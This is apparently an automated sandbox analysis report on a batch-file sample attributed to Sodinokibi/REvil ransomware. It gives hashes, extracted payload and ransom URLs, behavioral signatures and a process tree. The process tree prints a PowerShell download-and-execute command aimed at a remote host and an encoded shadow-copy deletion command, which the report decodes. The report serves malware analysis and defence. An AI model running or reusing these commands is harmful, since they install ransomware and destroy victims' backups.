Analysis
max time kernel: 115s
max time network: 113s
platform: windows7_x64
resource: win7v200430
submitted: 20-05-2020 14:10

Static task: static1
Behavioral task: behavioral1
  Sample: 76268c9536af4328d6c0da30152c5045.bat
  Resource: win7v200430
Behavioral task: behavioral2
  Sample: 76268c9536af4328d6c0da30152c5045.bat
  Resource: win10v200430
General
Target: 76268c9536af4328d6c0da30152c5045.bat
Size: 215B
MD5: 572a573b2da48bc8e094db663f4d54cd
SHA1: 3f06e7dc06fac49d4c675ad67cd2ba2113fb6d1e
SHA256: 8f7ad3b1ae4a99516d4e47fa682097895f767f07cbaf4ac432636610ca16a237
SHA512: d90c574c7012e4e58968023d625d18ccf5f713a2a9888e86bb10d692b5db6d9496cc0f3de1778ddfafebf64b5146ca625a58e09e2a939e7140cea9a00521b30d
Malware Config
Extracted
http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045
Extracted
C:\4702c1-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B753BD63BD6B200
http://decryptor.cc/5B753BD63BD6B200
Signatures

Suspicious use of WriteProcessMemory (5 IoCs)
Processes: cmd.exe, powershell.exe
  description                      | pid  | process        | target process
  PID 1008 wrote to memory of 1424 | 1008 | cmd.exe        | powershell.exe
  PID 1424 wrote to memory of 1548 | 1424 | powershell.exe | powershell.exe
  PID 1424 wrote to memory of 1548 | 1424 | powershell.exe | powershell.exe
  PID 1424 wrote to memory of 1548 | 1424 | powershell.exe | powershell.exe
  PID 1424 wrote to memory of 1548 | 1424 | powershell.exe | powershell.exe
Suspicious use of AdjustPrivilegeToken (7 IoCs)
Processes: powershell.exe, powershell.exe, vssvc.exe
  description                     | pid  | process
  Token: SeDebugPrivilege         | 1424 | powershell.exe
  Token: SeDebugPrivilege         | 1424 | powershell.exe
  Token: SeDebugPrivilege         | 1548 | powershell.exe
  Token: SeBackupPrivilege        | 528  | vssvc.exe
  Token: SeRestorePrivilege       | 528  | vssvc.exe
  Token: SeAuditPrivilege         | 528  | vssvc.exe
  Token: SeTakeOwnershipPrivilege | 1424 | powershell.exe
Suspicious behavior: EnumeratesProcesses (5 IoCs)
Processes: powershell.exe, powershell.exe
  pid  | process
  1424 | powershell.exe
  1424 | powershell.exe
  1424 | powershell.exe
  1548 | powershell.exe
  1548 | powershell.exe
Modifies service (2 TTPs, 4 IoCs)
Processes: vssvc.exe
  description | ioc                                                                                        | process
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer                 | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer               | vssvc.exe
  Key created | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer                      | vssvc.exe
Drops file in Program Files directory (32 IoCs)
Processes: powershell.exe
  description                  | ioc                                                                                   | process
  File opened for modification | \??\c:\program files\InstallFormat.3gp2                                               | powershell.exe
  File opened for modification | \??\c:\program files\SaveConvert.i64                                                  | powershell.exe
  File created                 | \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\4702c1-readme.txt | powershell.exe
  File opened for modification | \??\c:\program files\DismountExit.jpeg                                                | powershell.exe
  File opened for modification | \??\c:\program files\SendTrace.M2V                                                    | powershell.exe
  File opened for modification | \??\c:\program files\DenyReset.dwg                                                    | powershell.exe
  File opened for modification | \??\c:\program files\ExpandRemove.mhtml                                               | powershell.exe
  File opened for modification | \??\c:\program files\ResetNew.mp4v                                                    | powershell.exe
  File opened for modification | \??\c:\program files\TestReset.mpe                                                    | powershell.exe
  File created                 | \??\c:\program files\microsoft sql server compact edition\v3.5\4702c1-readme.txt      | powershell.exe
  File opened for modification | \??\c:\program files\GetStep.mhtml                                                    | powershell.exe
  File opened for modification | \??\c:\program files\OpenEnter.mp4                                                    | powershell.exe
  File opened for modification | \??\c:\program files\SwitchDisconnect.scf                                             | powershell.exe
  File opened for modification | \??\c:\program files\RedoDisconnect.m4v                                               | powershell.exe
  File opened for modification | \??\c:\program files\RemoveDisable.mpeg2                                              | powershell.exe
  File opened for modification | \??\c:\program files\RevokeRead.DVR-MS                                                | powershell.exe
  File opened for modification | \??\c:\program files\TestRead.vssx                                                    | powershell.exe
  File opened for modification | \??\c:\program files\GetRemove.txt                                                    | powershell.exe
  File opened for modification | \??\c:\program files\LimitOptimize.ogg                                                | powershell.exe
  File opened for modification | \??\c:\program files\MergeSelect.ogg                                                  | powershell.exe
  File opened for modification | \??\c:\program files\NewUse.ttc                                                       | powershell.exe
  File opened for modification | \??\c:\program files\OpenSave.png                                                     | powershell.exe
  File opened for modification | \??\c:\program files\ProtectMeasure.ogg                                               | powershell.exe
  File opened for modification | \??\c:\program files\TraceMeasure.search-ms                                           | powershell.exe
  File opened for modification | \??\c:\program files\UnpublishSuspend.easmx                                           | powershell.exe
  File created                 | \??\c:\program files (x86)\4702c1-readme.txt                                          | powershell.exe
  File opened for modification | \??\c:\program files\HideUnblock.pcx                                                  | powershell.exe
  File created                 | \??\c:\program files\microsoft sql server compact edition\4702c1-readme.txt           | powershell.exe
  File opened for modification | \??\c:\program files\SavePing.vstx                                                    | powershell.exe
  File created                 | \??\c:\program files\4702c1-readme.txt                                                | powershell.exe
  File opened for modification | \??\c:\program files\ConvertFromPublish.dib                                           | powershell.exe
  File opened for modification | \??\c:\program files\LimitHide.htm                                                    | powershell.exe
Modifies system certificate store (4 IoCs)
Processes: powershell.exe
  description       | ioc                                                                                                                      | process
  Set value (data)  | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = (blob data omitted) | powershell.exe
  Key created       | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13      | powershell.exe
  Set value (data)  | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = (blob data omitted) | powershell.exe
  Key created       | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436      | powershell.exe
Suspicious behavior: CmdExeWriteProcessMemorySpam (1 IoC)
Processes: powershell.exe
  pid  | process
  1424 | powershell.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoC)
Processes: powershell.exe
  description     | ioc                                                                                                                                          | process
  Set value (str) | \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z52r9.bmp" | powershell.exe
Drops file in System32 directory (1 IoC)
Processes: powershell.exe
  description                  | ioc                                     | process
  File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | powershell.exe
Sodin, Sodinokibi, REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.

Enumerates connected drives (3 TTPs)

Blacklisted process makes network request (89 IoCs)
Processes

C:\Windows\system32\cmd.exe (PID 1008, depth 1)
  Command line: cmd /c "C:\Users\Admin\AppData\Local\Temp\76268c9536af4328d6c0da30152c5045.bat"
  Signatures:
  - Suspicious use of WriteProcessMemory

  C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1424, depth 2)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045');Invoke-ANLMXOIN;Start-Sleep -s 10000"
    Signatures:
    - Suspicious use of WriteProcessMemory
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious behavior: EnumeratesProcesses
    - Drops file in Program Files directory
    - Modifies system certificate store
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    - Sets desktop wallpaper using registry
    - Drops file in System32 directory
    - Blacklisted process makes network request

    C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (PID 1548, depth 3)
      Command line: powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is base64-encoded UTF-16LE PowerShell; decoded by the editor, it reads: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} which is the shadow copy deletion that accounts for the vssvc.exe activity below)
      Signatures:
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses

C:\Windows\system32\vssvc.exe (PID 528, depth 1)
  Command line: C:\Windows\system32\vssvc.exe
  Signatures:
  - Suspicious use of AdjustPrivilegeToken
  - Modifies service